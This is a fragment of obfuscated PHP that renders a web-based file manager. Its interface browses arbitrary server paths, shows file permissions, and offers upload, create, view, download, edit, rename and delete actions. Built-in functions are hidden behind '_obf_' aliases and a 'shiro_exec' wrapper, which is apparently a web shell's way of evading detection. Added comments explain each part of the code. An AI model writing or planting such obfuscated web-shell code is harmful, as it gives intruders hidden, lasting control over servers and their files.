_obf_echo("<div class='header-logout'><a href='?logout' class='btn btn-secondary'>Logout</a></div><div style='clear:both;'></div>");
_obf_echo("<div class='breadcrumb'>Path: ");
build_breadcrumb($full_path);
_obf_echo("</div>");
// Status banner: the `msg` query parameter is shown HTML-escaped; it is styled as an
// error when it contains "failed" or "error", otherwise as success.
if (!_obf_empty($message)) {
    $type = (_obf_strpos(_obf_strtolower($message), 'failed') !== false || _obf_strpos(_obf_strtolower($message), 'error') !== false) ? 'error' : 'success';
    _obf_echo("<div class='notification " . $type . "'>" . _obf_htmlspecialchars($message) . "</div>");
}
// Tool cards: forms posting to the create_file, create_folder and upload actions.
_obf_echo("<div class='tools'>");
_obf_echo("<div class='tool-card'><h3>📄 New File</h3><form method='post' action='?a=create_file&p=" . _obf_rawurlencode($full_path) . "'><div class='form-group'><input type='text' name='filename' placeholder='filename.txt' required></div><button type='submit' class='btn'>Create</button></form></div>");
_obf_echo("<div class='tool-card'><h3>📁 New Folder</h3><form method='post' action='?a=create_folder&p=" . _obf_rawurlencode($full_path) . "'><div class='form-group'><input type='text' name='foldername' placeholder='folder_name' required></div><button type='submit' class='btn'>Create</button></form></div>");
_obf_echo("<div class='tool-card'><h3>📤 Upload File</h3><form method='post' enctype='multipart/form-data' action='?a=upload&p=" . _obf_rawurlencode($full_path) . "'><div class='form-group'><input type='file' name='file' required></div><button type='submit' class='btn'>Upload</button></form></div>");
_obf_echo("</div>");
_obf_echo("<table><thead><tr><th>Name</th><th>Size</th><th>Permissions</th><th>Actions</th></tr></thead><tbody>");
// "Go up" row, omitted when dirname() returns the same path (already at the top).
$parent_path = _obf_dirname($full_path);
if ($parent_path !== $full_path) {
    _obf_echo("<tr><td colspan='4'><strong><a href='?p=" . _obf_rawurlencode($parent_path) . "'>⬆️ Go up</a></strong></td></tr>");
}
// Directory listing: scandir() result split into folders and files. The scandir()
// return value is iterated without checking for failure.
$folders = [];
$files = [];
$items = shiro_exec('scandir', $full_path);
foreach ($items as $item) {
    if ($item == '.' || $item == '..') continue;
    $item_path = $full_path . '/' . $item;
    if (shiro_exec('is_dir', $item_path)) {
        $folders[] = ['name' => $item, 'path' => $item_path];
    } else {
        $files[] = ['name' => $item, 'path' => $item_path, 'size' => _obf_filesize($item_path)];
    }
}
sort($folders);
sort($files);
// Folder rows: link into the folder, plus rename and delete_folder action links.
foreach ($folders as $folder) {
    _obf_echo("<tr><td><a href='?p=" . _obf_rawurlencode($folder['path']) . "'>📁 " . _obf_htmlspecialchars($folder['name']) . "</a></td><td>-</td><td>" . perms($folder['path']) . "</td>");
    _obf_echo("<td class='actions'><a href='?a=rename_form&p=" . _obf_rawurlencode($full_path) . "&f=" . _obf_rawurlencode($folder['name']) . "&is_dir=1' title='Rename'>✏️</a> <a href='?a=delete_folder&p=" . _obf_rawurlencode($full_path) . "&f=" . _obf_rawurlencode($folder['name']) . "' onclick='return confirm(\"Delete folder?\")' class='btn-danger' title='Delete'>🗑️</a></td></tr>");
}
// File rows: size shown in bytes below 1024, otherwise in KB rounded to two decimals;
// links to the view, download, edit, rename and delete actions.
foreach ($files as $file) {
    $size = _obf_filesize($file['path']) < 1024 ? _obf_filesize($file['path']). ' B' : _obf_round(_obf_filesize($file['path']) / 1024, 2) . ' KB';
    _obf_echo("<tr><td><a href='?a=view&p=" . _obf_rawurlencode($full_path) . "&f=" . _obf_rawurlencode($file['name']) . "' title='View'>📄 " . _obf_htmlspecialchars($file['name']) . "</a></td><td>" . $size . "</td><td>" . perms($file['path']) . "</td>");
    _obf_echo("<td class='actions'><a href='?a=download&p=" . _obf_rawurlencode($full_path) . "&f=" . _obf_rawurlencode($file['name']) . "' title='Download'>📥</a> <a href='?a=edit&p=" . _obf_rawurlencode($full_path) . "&f=" . _obf_rawurlencode($file['name']) . "' title='Edit'>✏️</a> <a href='?a=rename_form&p=" . _obf_rawurlencode($full_path) . "&f=" . _obf_rawurlencode($file['name']) . "&is_dir=0' title='Rename'>📝</a> <a href='?a=delete&p=" . _obf_rawurlencode($full_path) . "&f=" . _obf_rawurlencode($file['name']) . "' onclick='return confirm(\"Delete file?\")' class='btn-danger' title='Delete'>🗑️</a></td></tr>");
}
_obf_echo("</tbody></table>");
_obf_echo("</div></body></html>");
?>